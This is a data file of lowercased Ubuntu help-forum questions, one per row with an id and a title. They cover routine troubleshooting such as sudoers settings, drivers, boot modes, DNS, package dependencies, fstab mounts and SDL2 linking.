/dev/sde version : 3.af serial : 5qd29gwd size : 698gib ( 750gb ) configuration : ansiversion=5
334317	live usb : how do i save files on hard drive	so i have never used linux or ubuntu before so at the moment i am just trying it out from a usb drive . my problem is that i would like to save files on the internal hard drive of the computer but i have no idea how . everythime i try saving something it only gives me an option to save on the usb drive .
334318	sudoers file , enable nopasswd for user , all commands	preface this is a fairly complex question related to the sudoers file and the sudo command in general . note : i have made these changes on a dedicated machine running ubuntu desktop 13.04 , that i use purely for learning purposes . i understand it 's a huge security risk to enable nopasswd sudo . question initially , my only change to the sudoers file ( /etc/sudoers ) was one line , a user specification that should have enabled 'nicholsonjf ' to run all commands with sudo without having to enter a password ( see the line that starts with 'nicholsonjf ' ) : # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults mail_badpass defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all nicholsonjf all=nopasswd : all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d however , this did not work , and i was still prompted for my password every time i ran a command as 'nicholsonjf ' . i was only able to start running sudo commands as 'nicholsonjf ' once i removed 'nicholsonjf ' from the sudo and admin groups . can anyone explain why this worked ? is it because the user 'nicholsonjf ' was inheriting sudo rights from the two group specifications of 'admin ' and 'sudo ' ( seen below in the sudoers file ) , which were overriding the 'nicholsonjf ' user specification because they were further down in the config file ?
334319	best nvidia additional driver option	hello , under additional drivers , there are a few options to choose from , but which one is the best ? using nvidia binary xorg driver , kernel module and vdpau library from nvidia-310-updates ( proprietary , tested ) using nvidia binary xorg driver , kernel module and vdpau library from nvidia-310-updates ( proprietary ) using nvidia binary xorg driver , kernel module and vdpau library from nvidia-304 ( proprietary ) using nvidia binary xorg driver , kernel module and vdpau library from nvidia-304-updates ( proprietary ) using nvidia binary xorg driver , kernel module and vdpau library from nvidia-313-updates ( proprietary ) the last one and the one that i have selected : using x.org x server - nouveau display driver from xserver-xorg-video-nouveau ( open source ) thanks in advance
334320	64-bit desktop iso vs 32-bit desktop iso : efi vs legacy boot mode	so my understanding is that ubuntu desktop 13.04 iso comes in two flavors : 32-bit ( supporting only legacy boot mode ) 64-bit ( supporting only efi boot ) is this correct ? what i want is a single bootable image that will boot on both my legacy computer and my newer computer . they both currently run 64-bit software , but i ca n't get the 64-bit image to boot on my older computer . i do n't really care if i run 32-bit or 64-bit ubuntu , what i do care about is using the same usb stick for either computer . is there an easy way to get the 64-bit image bootable in legacy boot mode for my older computer ? or is there an easy way to get the 32-bit image bootable under uefi on my newer computer ? or , if the 64-bit image should just work in legacy boot mode , please let me know . thanks .
334324	how to have a server the makes a clients update and download software offline ?	i guess i have to make a proxy server to be able the clients update and download offline . but how ? any ideas .
334325	nslookup keep using 127.0.0.1 specified in /etc/resolv.conf rather than using the name server specified in /etc/dnsmasq.conf	i want to use dnsmasq to specify some dns name server for some domains ( e.g . google ) in /etc/dnsmasq.conf , server=/www.google.com/8.8.4.4 . for the rest of the domains still use 127.0.0.1 which is defined in /etc/resolv.conf . but i found when i run nslookup manually , nslookup still used 127.0.0.1 rather than using 8.8.4.4 root @ root : /home/root # nslookup www.google.com server : 127.0.0.1 address : 127.0.0.1 # 53 non-authoritative answer : name : www.google.com address : 74.125.128.106 name : www.google.com address : 74.125.128.103 name : www.google.com address : 74.125.128.147 name : www.google.com address : 74.125.128.105 what is wrong with my configuration ? my networkmanager.conf is : [ main ] plugins=ifupdown , keyfile ** # dns=dnsmasq** [ ifupdown ] managed=true thank you very much in advance !
334327	how do i install browser plugins in a centralized way ?	i have 5 users on an ubuntu box and i want each user to have adblock+ ( and a few others ) for both firefox and chrome . is there a way to avoid logging in as each one with gui and starting both browsers and installing the plugins by hand ?
334328	typed `apt-get update` now showing a long list of edac errors . is there anything wrong ?	i typed apt-get update and then i saw a long list of edac i7core : lost 127 memory errors please help me understand what has happened . i am using ubuntu server edition 12.04 lts update : i followed gilles answer . i got the following when i do a dmesg [ 113893.215234 ] edac mc0 : ce error on cpu # 0channel # 1_dimm # 0 ( channel:1 slot:0 page:0x0 offset:0x0 grain:8 syndrome:0x0 ) [ 113893.215237 ] edac mc0 : ce error on cpu # 0channel # 1_dimm # 0 ( channel:1 slot:0 page:0x0 offset:0x0 grain:8 syndrome:0x0 ) [ 113893.215240 ] edac mc0 : ce error on cpu # 0channel # 1_dimm # 0 ( channel:1 slot:0 page:0x0 offset:0x0 grain:8 syndrome:0x0 ) [ 113893.215243 ] edac mc0 : ce error on cpu # 0channel # 1_dimm # 0 ( channel:1 slot:0 page:0x0 offset:0x0 grain:8 syndrome:0x0 ) [ 113893.215246 ] edac mc0 : ce error on cpu # 0channel # 1_dimm # 0 ( channel:1 slot:0 page:0x0 offset:0x0 grain:8 syndrome:0x0 ) [ 113893.215248 ] edac mc0 : ce error on cpu # 0channel # 1_dimm # 0 ( channel:1 slot:0 page:0x0 offset:0x0 grain:8 syndrome:0x0 ) [ 113893.215251 ] edac mc0 : ce error on cpu # 0channel # 1_dimm # 0 ( channel:1 slot:0 page:0x0 offset:0x0 grain:8 syndrome:0x0 )
334335	connecting to my svn server using https	i 'm trying to set up my svn server on ubuntu 12.04 so that i can access it with https instead of http that i 'm using now . i 've tried to set it up with https , and it works with a local connection . i can also connect to it with my public ip address , when i 'm in the house . i 've port-forwarded port number 443 to my server 's local ip address , but when i try to connect to it from outside my house , it wo n't work . i have openssl installed and configured with my apache2 server . so my question is , is this fixable and do you need to see my setup files before you can help me ? if so , just tell me and i will add it to the question !
334336	ubuntu 13.04 64 bit ar8161 usually off net	i have installed atheros ar8161 driver from compat-drivers-2013-03-04-u and can also connect to the network but keep getting disconnected . in order to reconnect , i have to pull out the network cable and plug it in . what can i do ?
334337	g++ installation unmet dependencies error	i am trying to install g++.but not able to do it . amol @ amol-system-product-name : ~ $ sudo apt-get install g++ [ sudo ] password for amol : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : apt-xapian-index : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed apturl : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed apturl-common : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed checkbox : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed command-not-found : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed duplicity : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed g++ : depends : g++-4.6 ( > = 4.6.3-1~ ) but it is not going to be installed gedit : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed gnome-orca : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed gnome-sudoku : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed gwibber : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed gwibber-service : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed hplip : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed hplip-data : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed ibus : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed ibus-pinyin : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed ibus-table : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed jockey-common : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed language-selector-common : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed language-selector-gnome : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed launchpad-integration : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed lsb-release : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed nvidia-common : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed onboard : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed oneconf : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python : depends : python2.6 ( > = 2.6.5 ) but it is not installable depends : python-minimal ( = 2.6.5-0ubuntu1 ) but 2.7.3-0ubuntu2.2 is to be installed python-appindicator : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-apport : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-apt : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-aptdaemon : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-aptdaemon.gtk3widgets : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-aptdaemon.pkcompat : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-brlapi : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-cairo : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-chardet : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-configglue : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-crypto : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-cups : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-cupshelpers : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-dateutil : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-dbus : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-debian : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-debtagshw : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-defer : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-dirspec : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-egenix-mxdatetime : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-egenix-mxtools : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-gconf : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-gdbm : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-gi : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-gi-cairo : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-gnomekeyring : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-gnupginterface : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-gobject-2 : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-gst0.10 : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-gtk2 : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-httplib2 : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-ibus : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-imaging : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-keyring : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-launchpadlib : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-lazr.restfulclient : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-lazr.uri : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-libproxy : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-libxml2 : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-louis : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-mako : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-markupsafe : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-notify : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-oauth : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-openssl : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-packagekit : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-pam : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-pexpect : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-piston-mini-client : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-problem-report : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-protobuf : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-pyatspi2 : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-pycurl : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-pyinotify : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-renderpm : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-reportlab : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-reportlab-accel : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-serial : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-simplejson : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-smbc : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-software-properties : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-speechd : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-twisted-bin : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-twisted-core : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-twisted-names : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-twisted-web : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-ubuntu-sso-client : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-ubuntuone-client : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-ubuntuone-control-panel : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-ubuntuone-storageprotocol : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-uno : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-virtkey : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed python-wadllib : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-xapian : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-xdg : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-xkit : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-zeitgeist : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed python-zope.interface : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed rhythmbox : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed rhythmbox-plugins : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed sessioninstaller : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed software-center : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed software-center-aptdaemon-plugins : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed software-properties-common : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed software-properties-gtk : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed totem : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed totem-plugins : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed ubuntu-sso-client-gtk : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed ubuntu-system-service : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed ubuntuone-couch : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed ubuntuone-installer : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed ufw : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed unity-lens-video : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed unity-scope-video-remote : depends : python ( > = 2.7 ) but 2.6.5-0ubuntu1 is to be installed update-manager : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed update-manager-core : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed usb-creator-common : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed usb-creator-gtk : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed xdiagnose : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
334341	how to remove very long list of files	my hard drive on my old pc is full up . it 's not a big hard drive so i have to be very selective about what i keep . this is not the first time this happens , but firefox keeps all unsubmitted crash reports , as .dmp and .extra files . in my disk utility , firefox pending crash reports take up about 13gb . this is very annoying because when it crashes it never asks if i want to send a report , and it does n't crash often so i do n't know how it fills up . i tried to navigate through folders to them and delete them , but it uses so much ram that once it has loaded , the window wo n't even respond to inputs . so i used the terminal , removed the space in crash reports , and tried to remove all files that way by changing to the directory and using rm ./* . * and then i tried ./*.dmp and ./*.extra but every time i get the same error : bash : /bin/rm : argument list too long so i 'm guessing it is too many files to pass the argument . can anyone help me with a way to remove all these pending reports where i wo n't have to type in each specific report because they are very long to type individually . thanks for any advice you may provide . edit : this is a new account , my reputation is low on this one so i ca n't post an answer for 7 hours which is stupid . so i 'm editing to answer my own question . actually i figured out a way to do it after i posted this . but i 'm going to post the way that i did it in case anyone has this same issue , or an issue with similarly labeled files . it is all about the labeling , which are labeled using a hex format . for example below , i copied and pasted a few 7fefb131-b757-f12f-072987c7-68919cbc.extra 7fefd48b-d795-1714-6ce8144d-17b5e21f.dmp 7fefd48b-d795-1714-6ce8144d-17b5e21f.extra 7ff02020-5bcb-b5c6-276167bb-0c1fa603.dmp 7ff02020-5bcb-b5c6-276167bb-0c1fa603.extra so since there were too many files over all to delete using rm ./ . what i did was this , to delete big sections at once : rm ./7e* . * rm ./7d* . * what this does is it goes through and deletes all files that begin with 7e , 7d , etc . since it 's hex you just need to go through 0-9 , a-f . however , instead of going through the second part of each filename ( 78*,79*,7a,7b,7c , and so on ) you could probably just use rm ./0* . * rm ./1* . * etc just going 0-9 , then a-f . i hope i explained this clearly enough , i hate being stuck on something like this and i 'm hoping i can help someone else . as long as you have files that follow suit like this in labeling , either hex format , or any format where a specific order is followed ( abc1.dmp , abc2.dmp , efg1.dmp , anything like that ) you can simply go down the list and take out large chunks of files instead of individual files . good luck . if anyone reads this and has editing points , please let me know , i 'm always looking to format better . it 's hard to keep things clear all the time when i 'm just typing exactly how i see it .
334343	rtorrent move on complete delay ?	this is the code i use to move directories/files on completion : system.method.set_key = event.download.finished , move_complete , '' d.set_directory=~/downloads ; execute=mv , -u , $ d.get_base_path= , ~/downloads '' does anyone know how i can add a 5 minute delay to this command so that it does n't immediately move them on completion ? cheers !
334345	how do i back up my ubuntu packages/settings/etc so that it can be restored from a clean install ?	i need to reinstall ubuntu , but it does n't have anything to do with wanting to clean my system or 'start fresh . ' i have my stuff pretty fine tuned , so i want to redo as little as possible .
334347	acer aspire one 722-0369 flaky ethernet connection	i have an acer aspire one 722 netbook running ubuntu 13.04 . it has a `` qualcomm atheros ar8152 v2.0 fast ethernet '' ethernet controller . when i connect to the internet via a wifi connection it works great . but sometimes do n't have access to wifi and must use a wired ethernet connection . when i use an ethernet connection , the internet connection seems to be flaky . about half of the time webpages will load . i have to keep reloading the page until it works .
334350	update manager issues	i am still getting used to dual running ubuntu on my windows 7 machine using wubi . i currently have ubuntu 12.01 and want to upgrade to 13.04 . according to the instructions here : http : //www.ubuntu.com/download/desktop/upgrade i first need to launch the dash and search for an `` upgrade manager '' . i do that but the only option i get is a software updater . any help ? ps , i am still getting used to using a terminal so i would really appreciate not using the terminal quite yet till i am more familiar with it ( if at all possible ) .
334357	12.10 boots to black screen after upgrade	i upgraded from 12.04 to 12.10 , but after upgrading , ubuntu boots too a black screen . how can if ix this ?
334363	ubuntu 13.04 wireless network adapter wo n't work ( asus usb-n53 )	i just installed ubuntu on my brand new built computer . i ended up buying asus usb-n53 network adapter for wifi but i can not connect it to internet . i see few wifi selections but when i click on the wifi , it would only attempt to connect but fails.. please help ! !
334365	how to add a directory to linker command line in linux	i am new to linux and i want to add lib64/librt.so.1 to linker commnad line . can anyone suggest how can i do this ? thanks in advance
334366	how to remove ubuntu and leave windows 7 and linux mint	i have installed mint olivia on my computer to run alongside windows 7 because i thought ubuntu would automatically be removed , being the computer vegetable that i am . now i have 3 systems . how can i remove ubuntu ? it is not in program files where mint is . thanks in advance for any help . it starts with ubuntu showing first then windows 7. when i click on windows seven it gives me the windows or mint option
334367	no sound on intel ich6m hd audio ( alc880 ) with intergrated conexant modem	ok , so i 'm facing this frustrating problem for a long time i just ca n't get the sound working on my asus w5g00ae with intel hd audio ( intel hda ) that features a realtek alc880 chipset and with a conexant modem integrated in it ( well i just do n't know why intel would integrate a modem with a sound card ? ) . i 've tried a lot of solutions on the web , and none of them worked . these are the things i tried : changing the model in /etc/modprobe.d/alsa-base.conf to auto , asus , asus-dig , asus-dig2 , 3stack , 6stack , and only when i changed it into 3stack , alsamixer can get my soundcard , and the desktop volume control will get the output device , not the dummy output purging the alsa-base and pulseaudio package with the apt-get purge command : apt-get remove -- purge alsa-base apt-get remove -- purge pulseaudio this didnt work , either using the pavucontrol package : well when i use this to monitor the output status , i can see rhythmbox playing music and the output volume bar is changing normally , but i still did n't hear any sound coming out of my laptop 's speakers but the funny thing is , my intergrated microphone is working normally since i can see the input db bar change when i tap it unmuting using alsamixer : all sound channels are unmuted , did n't work too thats all i 've tried . any other suggestions ? ? here 's my alsa info : alsa.org pulseaudio -- dump-conf pacmd dump-volumes : pastebin.com/df0a7bvk pactl info : pastebin.com/xtp77kjc
334369	ssh loing to a machine timed out	i 'm trying to ssh to a machine , but it hangs and gets timed out . $ ssh root @ < ip address > -v openssh_6.1p1 debian-4 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to < ip > [ < ip address > ] port 22. debug1 : connect to address < ip address > port 22 : connection timed out ping for the machine is disabled . also able to ssh to the machine from other computers . also able to ssh to other machines in the same network , from my machine .
334375	dual-boot ubuntu & windows query	i have dual-booted windows & ubuntu 13.04 now , after using ubuntu for quite a long time , i am planning to switch to linux based os only . i wan na remove windows & install opensuse os in place of that , but i do n't want to harm any data of ubuntu 13.04 as it 's my primary os . here 's the partition table : my question is : can i simply delete windows partition & install other linux os in place of that ? i am asking this because , in partition table it shows windows ( loader ) , so i wan na ask that if i do what i mention , are there any chance of not booting into os at all ? i do n't want to setup my ubuntu os again .
334376	how to modify fstab for windows ntfs drive , and removing raid	i am trying to automatically mount 2 drives that have been previously formatted in windows and have all my research ( so i am trying to tread carefully ) , but running into some questions . the hd are ntfs formatted , and in fstab i already see them , but they do not mount automatically : /dev/sdb1 /media/sdb1/ linux_raid_member defaults 0 0 /dev/sdc1 /media/sdc1/ linux_raid_member defaults 0 0 so ubuntu thinks this is a raid setup , but the drives are not in raid and have different information ( legacy from two other drives that i was attempting to set up in raid ) . so wonder if by just changing the line information to : uuid=xxxxx /dev/sdb1 /media/sdb1 ntfs-3g defaults locale=en_us.utf8 0 0 uuid=xxxxx /dev/sdc2 /media/sdc1 ntfs-3g defaults locale=en_us.utf8 0 0 xxxxx = the actual uuid . would be enough or do i need to do something different ? also : a ) not sure if each drive should have its own locale , or they can share locales ? b ) would removing the linux_raid_member section affect the reading of the drives ? any input would be much appreciated . thank you , i first setup the directories under home : /home/data/one /home/data/two next , edited fstab : uuid=xxxx /home/data/one auto defaults 0 0 uuid=xxxx /home/data/two auto defaults 0 0 however , when using sudo mount -a i still get that the directories do not exist . when restarting ubuntu - at startup i get the problem mounting the drives '' however , i can not tell if it is because it can not identify the drives , or if it is because of problems with the code line in fstab . any thoughts ? should i use ntfs-3g instead of auto , for example ?
334378	editing the path files for configuring make file	i installed a new software in my ubuntu 12.04 . to install i downloaded it , and then do these in the terminal cd ~/downloads chmod +x gpucomputingsdk_4.2.9_linux.run ./gpucomputingsdk_4.2.9_linux.run after installation at the last it showed in order to configure the make file i should do the following path should be included with /usr/local/cuda/bin ld_library_path should be included with /usr/local/cuda/lib i was newbie , can you please help me to do them permanently ... ... ...
334380	error from software center : dependency is not satisfiable	when i click on .deb file for installation , and software center is opened and giving the error dependency is not satisfiable : hal
334389	access /home partition	i have installed 13.04 and created 2 partitions : one with ext4 journaling system / mount point ( 36gb ) for songs and other with /home mount point for videos ( 43gb ) and a swap partition of 1gb . i am able to see only / partition and not /home partition . that means i can not use /home partition to save videos ? how to access /home partition also so that i would be able to use 79gb ( both the partitions : / and /home ) of my hard disc ? please help . thanks .
334396	sdl2 - undefined references	i just started using sdl2 ( on ubuntu 13.04 x64 ) and everything was going fine , until i tried to use sdl_image . i added this piece of code , for loading images : sdl_texture* loadimage ( std : :string file ) { sdl_texture* tex = null ; tex = img_loadtexture ( ren , file.c_str ( ) ) ; if ( tex == null ) throw std : :runtime_error ( `` failed to load image : `` + file + img_geterror ( ) ) ; return tex ; } i link with -lsdl2 and -lsdl2_image , and i get this undefined references : g++ -o `` sdl '' ./src/main.o -lsdl2 -lsdl2_image /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_malloc '' /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_memcmp '' /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_strncasecmp '' /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_memset '' /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_free '' /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_memcpy '' /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_sscanf '' /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_isspace '' /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_realloc '' /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_strcmp '' /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_strncmp '' 